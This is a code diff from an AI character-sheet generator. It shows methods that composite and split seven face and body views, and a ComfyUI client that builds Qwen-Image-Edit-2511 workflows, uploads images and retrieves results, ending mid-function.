                logger.warning(f"Attempt {attempt + 1} failed: {result.message}")

            except Exception as e:
                logger.error(f"Attempt {attempt + 1} exception: {e}")
                # Surface the exception text only on the final attempt;
                # earlier exceptions fall through to the next retry.
                if attempt == max_retries - 1:
                    return None, str(e)

        return None, f"All {max_retries} attempts failed"
|
| 576 |
+
|
| 577 |
+
def composite_character_sheet(
    self,
    left_face: Image.Image,
    front_face: Image.Image,
    right_face: Image.Image,
    left_body: Image.Image,
    front_body: Image.Image,
    right_body: Image.Image,
    back_body: Image.Image
) -> Image.Image:
    """Assemble the 7 generated views into a single character sheet.

    Layout:
        top row    — three face portraits (left profile, front, right profile)
        bottom row — four body views (left, front, right, back)
    The two rows are separated vertically by ``self.config.spacing``
    pixels; views within a row are packed edge to edge.
    """
    # Normalize every input to a PIL image up front.
    faces = [
        ensure_pil_image(left_face, "left_face"),
        ensure_pil_image(front_face, "front_face"),
        ensure_pil_image(right_face, "right_face"),
    ]
    bodies = [
        ensure_pil_image(left_body, "left_body"),
        ensure_pil_image(front_body, "front_body"),
        ensure_pil_image(right_body, "right_body"),
        ensure_pil_image(back_body, "back_body"),
    ]

    gap = self.config.spacing

    # Canvas must fit the wider of the two rows; its height is the
    # front-face height plus the gap plus the front-body height.
    face_row_w = sum(img.width for img in faces)
    body_row_w = sum(img.width for img in bodies)
    sheet = Image.new(
        'RGB',
        (max(face_row_w, body_row_w), faces[1].height + gap + bodies[1].height),
        color=self.config.background_color,
    )

    # Top row: face portraits, left to right.
    cursor = 0
    for img in faces:
        sheet.paste(img, (cursor, 0))
        cursor += img.width

    # Bottom row: body views, placed below the face row and the gap.
    cursor = 0
    row_y = faces[1].height + gap
    for img in bodies:
        sheet.paste(img, (cursor, row_y))
        cursor += img.width

    return sheet
|
| 637 |
+
|
| 638 |
+
def extract_views_from_sheet(
    self,
    character_sheet: Image.Image
) -> Dict[str, Image.Image]:
    """
    Extract individual views from character sheet.

    Locates the horizontal separator between the face row and the body
    row by scanning the middle third of the sheet for the darkest
    1-pixel line (the spacing bar is assumed to be darker than the
    artwork), then crops out the 7 views.

    Returns:
        Dictionary with 7 extracted views
        (left/front/right face, left/front/right/back body)
    """
    sheet_width, sheet_height = character_sheet.size
    spacing = self.config.spacing

    # Find separator by scanning for dark bar.
    # Only the middle third is scanned — the separator is expected there.
    scan_start = sheet_height // 3
    scan_end = (2 * sheet_height) // 3

    min_brightness = 255
    separator_y = scan_start

    for y in range(scan_start, scan_end):
        # Sample only the leftmost 200px of each scanline for speed.
        line = character_sheet.crop((0, y, min(200, sheet_width), y + 1))
        pixels = list(line.getdata())
        # Grayscale images yield scalars; RGB(A) yields tuples — average RGB.
        avg_brightness = sum(
            sum(p[:3]) / 3 if isinstance(p, tuple) else p
            for p in pixels
        ) / len(pixels)

        if avg_brightness < min_brightness:
            min_brightness = avg_brightness
            separator_y = y

    # Everything above the darkest line is the face row.
    face_height = separator_y
    body_start_y = separator_y + spacing
    body_height = sheet_height - body_start_y

    # Calculate widths from aspect ratios
    # (faces assumed 3:4 portrait, bodies assumed 9:16 — widths are
    # derived from the row heights, not measured from the sheet).
    face_width = (face_height * 3) // 4
    body_width = (body_height * 9) // 16

    # Extract views: three equal-width face crops on top,
    # four equal-width body crops on the bottom.
    views = {
        'left_face': character_sheet.crop((0, 0, face_width, face_height)),
        'front_face': character_sheet.crop((face_width, 0, 2 * face_width, face_height)),
        'right_face': character_sheet.crop((2 * face_width, 0, 3 * face_width, face_height)),
        'left_body': character_sheet.crop((0, body_start_y, body_width, body_start_y + body_height)),
        'front_body': character_sheet.crop((body_width, body_start_y, 2 * body_width, body_start_y + body_height)),
        'right_body': character_sheet.crop((2 * body_width, body_start_y, 3 * body_width, body_start_y + body_height)),
        'back_body': character_sheet.crop((3 * body_width, body_start_y, 4 * body_width, body_start_y + body_height)),
    }

    return views
|
| 690 |
+
|
| 691 |
+
def _save_outputs(
    self,
    character_name: str,
    stages: dict,
    output_dir: Path
) -> Path:
    """Write every PIL image in *stages* into a timestamped folder.

    The folder is named ``<sanitized-name>_<YYYYmmdd_HHMMSS>`` under
    *output_dir*; non-image values in *stages* are skipped.

    Returns:
        The directory that was created.
    """
    safe_name = sanitize_filename(character_name)
    stamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    target = Path(output_dir) / f"{safe_name}_{stamp}"
    target.mkdir(parents=True, exist_ok=True)

    for stage_name, stage_image in stages.items():
        # Only genuine PIL images are saved; other stage values are metadata.
        if isinstance(stage_image, Image.Image):
            save_image(stage_image, target, f"{safe_name}_{stage_name}")

    logger.info(f"Saved outputs to: {target}")
    return target
|
src/comfyui_client.py
ADDED
|
@@ -0,0 +1,578 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
ComfyUI Client for Qwen-Image-Edit-2511
|
| 3 |
+
========================================
|
| 4 |
+
|
| 5 |
+
Client to interact with ComfyUI API for running Qwen-Image-Edit-2511.
|
| 6 |
+
|
| 7 |
+
Model setup (download from HuggingFace):
|
| 8 |
+
|
| 9 |
+
Lightning (default, 4-step):
|
| 10 |
+
diffusion_models/ qwen_image_edit_2511_fp8_e4m3fn_scaled_lightning_comfyui_4steps_v1.0.safetensors
|
| 11 |
+
(lightx2v/Qwen-Image-Edit-2511-Lightning)
|
| 12 |
+
|
| 13 |
+
Standard (20-step, optional):
|
| 14 |
+
diffusion_models/ qwen_image_edit_2511_fp8mixed.safetensors
|
| 15 |
+
(Comfy-Org/Qwen-Image-Edit_ComfyUI)
|
| 16 |
+
|
| 17 |
+
Shared:
|
| 18 |
+
text_encoders/ qwen_2.5_vl_7b_fp8_scaled.safetensors (Comfy-Org/Qwen-Image_ComfyUI)
|
| 19 |
+
vae/ qwen_image_vae.safetensors (Comfy-Org/Qwen-Image_ComfyUI)
|
| 20 |
+
|
| 21 |
+
Required custom nodes:
|
| 22 |
+
- Comfyui-QwenEditUtils (lrzjason) for TextEncodeQwenImageEditPlus
|
| 23 |
+
"""
|
| 24 |
+
|
| 25 |
+
import logging
|
| 26 |
+
import time
|
| 27 |
+
import uuid
|
| 28 |
+
import json
|
| 29 |
+
import io
|
| 30 |
+
import base64
|
| 31 |
+
from typing import Optional, List, Tuple
|
| 32 |
+
from PIL import Image
|
| 33 |
+
import websocket
|
| 34 |
+
import urllib.request
|
| 35 |
+
import urllib.parse
|
| 36 |
+
|
| 37 |
+
from .models import GenerationRequest, GenerationResult
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
logger = logging.getLogger(__name__)
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
class ComfyUIClient:
|
| 44 |
+
"""
|
| 45 |
+
Client for ComfyUI API to run Qwen-Image-Edit-2511.
|
| 46 |
+
|
| 47 |
+
Requires ComfyUI running with:
|
| 48 |
+
- Qwen-Image-Edit-2511 model in models/diffusion_models/
|
| 49 |
+
- Qwen 2.5 VL 7B text encoder in models/text_encoders/
|
| 50 |
+
- Qwen Image VAE in models/vae/
|
| 51 |
+
- Comfyui-QwenEditUtils custom node installed
|
| 52 |
+
"""
|
| 53 |
+
|
| 54 |
+
# Default ComfyUI settings
|
| 55 |
+
DEFAULT_HOST = "127.0.0.1"
|
| 56 |
+
DEFAULT_PORT = 8188
|
| 57 |
+
|
| 58 |
+
# Model file names (expected in ComfyUI models/ subfolders)
|
| 59 |
+
# Lightning: baked model (LoRA pre-merged, ComfyUI-specific format)
|
| 60 |
+
UNET_MODEL_LIGHTNING = "qwen_image_edit_2511_fp8_e4m3fn_scaled_lightning_comfyui_4steps_v1.0.safetensors"
|
| 61 |
+
# Standard: base fp8mixed model (20-step, higher quality)
|
| 62 |
+
UNET_MODEL_STANDARD = "qwen_image_edit_2511_fp8mixed.safetensors"
|
| 63 |
+
TEXT_ENCODER = "qwen_2.5_vl_7b_fp8_scaled.safetensors"
|
| 64 |
+
VAE_MODEL = "qwen_image_vae.safetensors"
|
| 65 |
+
|
| 66 |
+
# Target output dimensions per aspect ratio.
|
| 67 |
+
# Generation happens at 1024x1024, then crop+resize to these.
|
| 68 |
+
ASPECT_RATIOS = {
|
| 69 |
+
"1:1": (1024, 1024),
|
| 70 |
+
"16:9": (1344, 768),
|
| 71 |
+
"9:16": (768, 1344),
|
| 72 |
+
"21:9": (1680, 720),
|
| 73 |
+
"3:2": (1248, 832),
|
| 74 |
+
"2:3": (832, 1248),
|
| 75 |
+
"3:4": (896, 1152),
|
| 76 |
+
"4:3": (1152, 896),
|
| 77 |
+
"4:5": (1024, 1280),
|
| 78 |
+
"5:4": (1280, 1024),
|
| 79 |
+
}
|
| 80 |
+
|
| 81 |
+
# Generate at 1024x1024 (proven safe for Qwen's VAE), then crop+resize
|
| 82 |
+
NATIVE_RESOLUTION = (1024, 1024)
|
| 83 |
+
|
| 84 |
+
# With Lightning LoRA: 4 steps, CFG 1.0 (fast, ~seconds per view)
|
| 85 |
+
# Without LoRA: 20 steps, CFG 4.0
|
| 86 |
+
DEFAULT_STEPS_LIGHTNING = 4
|
| 87 |
+
DEFAULT_STEPS_STANDARD = 20
|
| 88 |
+
DEFAULT_CFG_LIGHTNING = 1.0
|
| 89 |
+
DEFAULT_CFG_STANDARD = 4.0
|
| 90 |
+
|
| 91 |
+
def __init__(
    self,
    host: str = DEFAULT_HOST,
    port: int = DEFAULT_PORT,
    use_lightning: bool = True,
):
    """Create a client bound to a ComfyUI server.

    Args:
        host: ComfyUI server host
        port: ComfyUI server port
        use_lightning: When True, use the 4-step Lightning model
            (much faster); otherwise the 20-step standard model.
    """
    self.host = host
    self.port = port
    self.use_lightning = use_lightning
    # Unique id so websocket progress messages can be matched to us.
    self.client_id = str(uuid.uuid4())
    self.server_address = f"{host}:{port}"

    # Lightning has the LoRA pre-merged, so it runs far fewer steps
    # and effectively no classifier-free guidance.
    self.num_inference_steps = (
        self.DEFAULT_STEPS_LIGHTNING if use_lightning else self.DEFAULT_STEPS_STANDARD
    )
    self.cfg_scale = (
        self.DEFAULT_CFG_LIGHTNING if use_lightning else self.DEFAULT_CFG_STANDARD
    )

    logger.info(
        f"ComfyUIClient initialized for {self.server_address} "
        f"(lightning={use_lightning}, steps={self.num_inference_steps})"
    )
|
| 122 |
+
|
| 123 |
+
def is_healthy(self) -> bool:
    """Return True when the ComfyUI server answers its stats endpoint."""
    try:
        with urllib.request.urlopen(
            f"http://{self.server_address}/system_stats", timeout=5
        ) as resp:
            return resp.status == 200
    except Exception:
        # Any network/HTTP failure simply means "not healthy".
        return False
|
| 131 |
+
|
| 132 |
+
def _upload_image(self, image: Image.Image, name: str = "input.png") -> Optional[str]:
    """
    Upload an image to ComfyUI, pre-resized to fit within 1024x1024.

    The multipart/form-data body is built by hand (no third-party HTTP
    library) and POSTed to ComfyUI's /upload/image endpoint.

    Args:
        image: PIL Image to upload
        name: Filename for the uploaded image

    Returns:
        Filename on server, or None if failed
    """
    try:
        # Pre-resize to keep total pixels around 1024x1024 (matching reference workflow).
        # Scale factor preserves aspect ratio: sqrt of the pixel-count ratio.
        max_pixels = 1024 * 1024
        w, h = image.size
        if w * h > max_pixels:
            scale = (max_pixels / (w * h)) ** 0.5
            new_w = int(w * scale)
            new_h = int(h * scale)
            image = image.resize((new_w, new_h), Image.LANCZOS)
            logger.debug(f"Pre-resized input from {w}x{h} to {new_w}x{new_h}")

        # Convert image to bytes (always PNG, regardless of source format).
        img_bytes = io.BytesIO()
        image.save(img_bytes, format='PNG')
        img_bytes.seek(0)

        # Create multipart form data with a random boundary token.
        boundary = uuid.uuid4().hex

        body = b''
        body += f'--{boundary}\r\n'.encode()
        body += f'Content-Disposition: form-data; name="image"; filename="{name}"\r\n'.encode()
        body += b'Content-Type: image/png\r\n\r\n'
        body += img_bytes.read()
        body += f'\r\n--{boundary}--\r\n'.encode()

        url = f"http://{self.server_address}/upload/image"
        req = urllib.request.Request(
            url,
            data=body,
            headers={
                'Content-Type': f'multipart/form-data; boundary={boundary}'
            }
        )

        with urllib.request.urlopen(req) as response:
            # ComfyUI echoes back the stored filename under 'name'.
            result = json.loads(response.read())
            return result.get('name')

    except Exception as e:
        # Upload is best-effort: callers treat None as "skip this reference".
        logger.error(f"Failed to upload image: {e}")
        return None
|
| 185 |
+
|
| 186 |
+
def _queue_prompt(self, prompt: dict) -> str:
    """Submit a workflow to ComfyUI's /prompt endpoint.

    A client-generated UUID is sent along as the prompt id so later
    history and websocket lookups can reference it.

    Args:
        prompt: Workflow prompt dict

    Returns:
        Prompt ID
    """
    submission_id = str(uuid.uuid4())
    payload = json.dumps({
        "prompt": prompt,
        "client_id": self.client_id,
        "prompt_id": submission_id,
    }).encode('utf-8')

    request = urllib.request.Request(
        f"http://{self.server_address}/prompt", data=payload
    )
    urllib.request.urlopen(request)

    return submission_id
|
| 205 |
+
|
| 206 |
+
def _get_history(self, prompt_id: str) -> dict:
    """Fetch the recorded execution history for *prompt_id*."""
    endpoint = f"http://{self.server_address}/history/{prompt_id}"
    with urllib.request.urlopen(endpoint) as resp:
        return json.loads(resp.read())
|
| 211 |
+
|
| 212 |
+
def _get_image(self, filename: str, subfolder: str, folder_type: str) -> bytes:
    """Download raw image bytes from ComfyUI's /view endpoint."""
    query = urllib.parse.urlencode(
        {"filename": filename, "subfolder": subfolder, "type": folder_type}
    )
    with urllib.request.urlopen(f"http://{self.server_address}/view?{query}") as resp:
        return resp.read()
|
| 219 |
+
|
| 220 |
+
def _wait_for_completion(self, prompt_id: str, timeout: float = 900.0) -> bool:
    """
    Wait for prompt execution to complete using websocket.

    Listens on ComfyUI's websocket for the 'executing' message whose
    node id is None — that signals the end of the workflow.

    Args:
        prompt_id: The prompt ID to wait for
        timeout: Maximum time to wait in seconds (default 15 min for image editing)

    Returns:
        True if completed successfully, False if timeout/error
    """
    ws = None
    try:
        ws_url = f"ws://{self.server_address}/ws?clientId={self.client_id}"
        ws = websocket.WebSocket()
        ws.settimeout(timeout)
        ws.connect(ws_url)

        start_time = time.time()
        while time.time() - start_time < timeout:
            try:
                out = ws.recv()
            except websocket.WebSocketTimeoutException:
                continue

            if not isinstance(out, str):
                continue  # binary frames (previews) are not status messages

            # Use .get so a malformed/unknown message is skipped instead of
            # raising KeyError — previously that aborted the whole wait.
            message = json.loads(out)
            msg_type = message.get('type')
            if msg_type == 'executing':
                data = message.get('data', {})
                # node == None marks the end of the workflow execution.
                if data.get('node') is None and data.get('prompt_id') == prompt_id:
                    return True
            elif msg_type == 'execution_error':
                logger.error(f"Execution error: {message}")
                return False

        logger.error("Timeout waiting for completion")
        return False

    except Exception as e:
        logger.error(f"WebSocket error: {e}")
        return False
    finally:
        if ws:
            try:
                ws.close()
            except Exception:
                # Best-effort close; never mask the real outcome.
                pass
|
| 266 |
+
|
| 267 |
+
def _get_dimensions(self, aspect_ratio: str) -> Tuple[int, int]:
|
| 268 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 269 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 270 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 271 |
+
|
| 272 |
+
@staticmethod
def _crop_and_resize(image: Image.Image, target_w: int, target_h: int) -> Image.Image:
    """Center-crop *image* to the target aspect ratio, then resize.

    When the source ratio is already within 1% of the target, the
    crop is skipped and the image is only resized.
    """
    src_w, src_h = image.size
    wanted = target_w / target_h
    actual = src_w / src_h

    # Close enough: a plain resize will not visibly distort.
    if abs(wanted - actual) < 0.01:
        return image.resize((target_w, target_h), Image.LANCZOS)

    if wanted < actual:
        # Source is too wide: trim equal amounts from both sides.
        keep_w = int(src_h * wanted)
        left = (src_w - keep_w) // 2
        trimmed = image.crop((left, 0, left + keep_w, src_h))
    else:
        # Source is too tall: trim equal amounts from top and bottom.
        keep_h = int(src_w / wanted)
        top = (src_h - keep_h) // 2
        trimmed = image.crop((0, top, src_w, top + keep_h))

    return trimmed.resize((target_w, target_h), Image.LANCZOS)
|
| 292 |
+
|
| 293 |
+
def _build_workflow(
    self,
    prompt: str,
    width: int,
    height: int,
    input_images: Optional[List[str]] = None,
    negative_prompt: str = ""
) -> dict:
    """
    Build the ComfyUI workflow for Qwen-Image-Edit-2511.

    Workflow graph:
        UNETLoader → KSampler
        CLIPLoader → TextEncodeQwenImageEditPlus (pos/neg)
        VAELoader → TextEncode + VAEDecode
        LoadImage(s) → TextEncodeQwenImageEditPlus
        EmptySD3LatentImage → KSampler
        KSampler → VAEDecode → PreviewImage

    Lightning mode uses a baked model (LoRA pre-merged), no separate
    LoRA or ModelSamplingAuraFlow nodes needed.

    Args:
        prompt: Positive text prompt.
        width: Latent/canvas width in pixels.
        height: Latent/canvas height in pixels.
        input_images: Server-side filenames of uploaded reference
            images (only the first 3 are used).
        negative_prompt: Negative text prompt; a single space is sent
            when empty (the encoder node requires non-empty text).

    Returns:
        Workflow dict in ComfyUI's API "prompt" format — node ids are
        stringified sequential integers.
    """
    workflow = {}
    node_id = 1

    # --- Model loading ---

    # Select model based on lightning mode
    unet_name = (self.UNET_MODEL_LIGHTNING if self.use_lightning
                 else self.UNET_MODEL_STANDARD)

    # UNETLoader - weight_dtype "default" lets ComfyUI auto-detect fp8
    unet_id = str(node_id)
    workflow[unet_id] = {
        "class_type": "UNETLoader",
        "inputs": {
            "unet_name": unet_name,
            "weight_dtype": "default"
        }
    }
    node_id += 1

    # CLIPLoader — loads the Qwen 2.5 VL text encoder
    clip_id = str(node_id)
    workflow[clip_id] = {
        "class_type": "CLIPLoader",
        "inputs": {
            "clip_name": self.TEXT_ENCODER,
            "type": "qwen_image"
        }
    }
    node_id += 1

    # VAELoader
    vae_id = str(node_id)
    workflow[vae_id] = {
        "class_type": "VAELoader",
        "inputs": {
            "vae_name": self.VAE_MODEL
        }
    }
    node_id += 1

    model_out_id = unet_id

    # --- Input images ---

    image_loader_ids = []
    if input_images:
        for img_name in input_images[:3]:  # Max 3 reference images
            img_loader_id = str(node_id)
            workflow[img_loader_id] = {
                "class_type": "LoadImage",
                "inputs": {
                    "image": img_name
                }
            }
            image_loader_ids.append(img_loader_id)
            node_id += 1

    # --- Text encoding ---

    # Positive: prompt + vision references + VAE
    pos_encode_id = str(node_id)
    pos_inputs = {
        "clip": [clip_id, 0],
        "prompt": prompt,
        "vae": [vae_id, 0]
    }
    # Reference images are wired as image1..image3 on the encoder node.
    for i, loader_id in enumerate(image_loader_ids):
        pos_inputs[f"image{i+1}"] = [loader_id, 0]

    workflow[pos_encode_id] = {
        "class_type": "TextEncodeQwenImageEditPlus",
        "inputs": pos_inputs
    }
    node_id += 1

    # Negative: text only, no images
    neg_encode_id = str(node_id)
    workflow[neg_encode_id] = {
        "class_type": "TextEncodeQwenImageEditPlus",
        "inputs": {
            "clip": [clip_id, 0],
            "prompt": negative_prompt or " ",
            "vae": [vae_id, 0]
        }
    }
    node_id += 1

    # --- Latent + sampling ---

    latent_id = str(node_id)
    workflow[latent_id] = {
        "class_type": "EmptySD3LatentImage",
        "inputs": {
            "width": width,
            "height": height,
            "batch_size": 1
        }
    }
    node_id += 1

    sampler_id = str(node_id)
    workflow[sampler_id] = {
        "class_type": "KSampler",
        "inputs": {
            "model": [model_out_id, 0],
            "positive": [pos_encode_id, 0],
            "negative": [neg_encode_id, 0],
            "latent_image": [latent_id, 0],
            # Time-based seed, wrapped to ComfyUI's 32-bit seed range.
            "seed": int(time.time()) % 2**32,
            "steps": self.num_inference_steps,
            "cfg": self.cfg_scale,
            "sampler_name": "euler",
            "scheduler": "simple",
            "denoise": 1.0
        }
    }
    node_id += 1

    # --- Decode + output ---

    decode_id = str(node_id)
    workflow[decode_id] = {
        "class_type": "VAEDecode",
        "inputs": {
            "samples": [sampler_id, 0],
            "vae": [vae_id, 0]
        }
    }
    node_id += 1

    # PreviewImage writes to ComfyUI's temp dir; generate() fetches it
    # back via the /view endpoint with type 'temp'.
    preview_id = str(node_id)
    workflow[preview_id] = {
        "class_type": "PreviewImage",
        "inputs": {
            "images": [decode_id, 0]
        }
    }

    return workflow
|
| 455 |
+
|
| 456 |
+
def generate(
    self,
    request: GenerationRequest,
    num_inference_steps: Optional[int] = None,
    cfg_scale: Optional[float] = None
) -> GenerationResult:
    """
    Generate/edit image using Qwen-Image-Edit-2511 via ComfyUI.

    Generates at native 1024x1024, then crop+resize to requested
    aspect ratio for clean VAE output.

    Args:
        request: Prompt, optional reference images, aspect ratio.
        num_inference_steps: Override for the instance step count.
        cfg_scale: Override for the instance CFG scale.

    Returns:
        GenerationResult carrying the image on success, or an error
        message on failure (no exception escapes this method).
    """
    if not self.is_healthy():
        return GenerationResult.error_result(
            "ComfyUI server is not accessible. Make sure ComfyUI is running on "
            f"{self.server_address}"
        )

    try:
        start_time = time.time()

        # Target dimensions for post-processing
        target_w, target_h = self._get_dimensions(request.aspect_ratio)
        # Generate at native resolution (VAE-safe)
        native_w, native_h = self.NATIVE_RESOLUTION

        # Upload input images (max 3; failed uploads are skipped, not fatal)
        uploaded_images = []
        if request.has_input_images:
            for i, img in enumerate(request.input_images):
                if img is not None:
                    name = f"input_{i}_{uuid.uuid4().hex[:8]}.png"
                    uploaded_name = self._upload_image(img, name)
                    if uploaded_name:
                        uploaded_images.append(uploaded_name)
                    else:
                        logger.warning(f"Failed to upload image {i}")

        # NOTE(review): 'or' treats an explicit 0 override as "unset";
        # an 'is not None' check would be stricter — confirm intent.
        steps = num_inference_steps or self.num_inference_steps
        cfg = cfg_scale or self.cfg_scale

        # Temporarily set for workflow build
        # NOTE(review): mutating instance state here is not thread-safe;
        # fine for single-threaded use.
        old_steps, old_cfg = self.num_inference_steps, self.cfg_scale
        self.num_inference_steps, self.cfg_scale = steps, cfg

        workflow = self._build_workflow(
            prompt=request.prompt,
            width=native_w,
            height=native_h,
            input_images=uploaded_images or None,
            negative_prompt=request.negative_prompt or ""
        )

        self.num_inference_steps, self.cfg_scale = old_steps, old_cfg

        logger.info(f"Generating with ComfyUI/Qwen: {request.prompt[:80]}...")
        logger.info(
            f"Native: {native_w}x{native_h}, target: {target_w}x{target_h}, "
            f"steps: {steps}, cfg: {cfg}, images: {len(uploaded_images)}, "
            f"lightning: {self.use_lightning}"
        )

        # Queue and wait
        prompt_id = self._queue_prompt(workflow)
        logger.info(f"Queued prompt: {prompt_id}")

        if not self._wait_for_completion(prompt_id):
            return GenerationResult.error_result("Generation failed or timed out")

        # Retrieve output
        history = self._get_history(prompt_id)
        if prompt_id not in history:
            return GenerationResult.error_result("No history found for prompt")

        # First image found in any output node wins (PreviewImage node).
        outputs = history[prompt_id].get('outputs', {})
        for nid, node_output in outputs.items():
            if 'images' in node_output:
                for img_info in node_output['images']:
                    img_data = self._get_image(
                        img_info['filename'],
                        img_info.get('subfolder', ''),
                        img_info.get('type', 'temp')
                    )
                    image = Image.open(io.BytesIO(img_data))
                    generation_time = time.time() - start_time
                    logger.info(f"Generated in {generation_time:.2f}s: {image.size}")

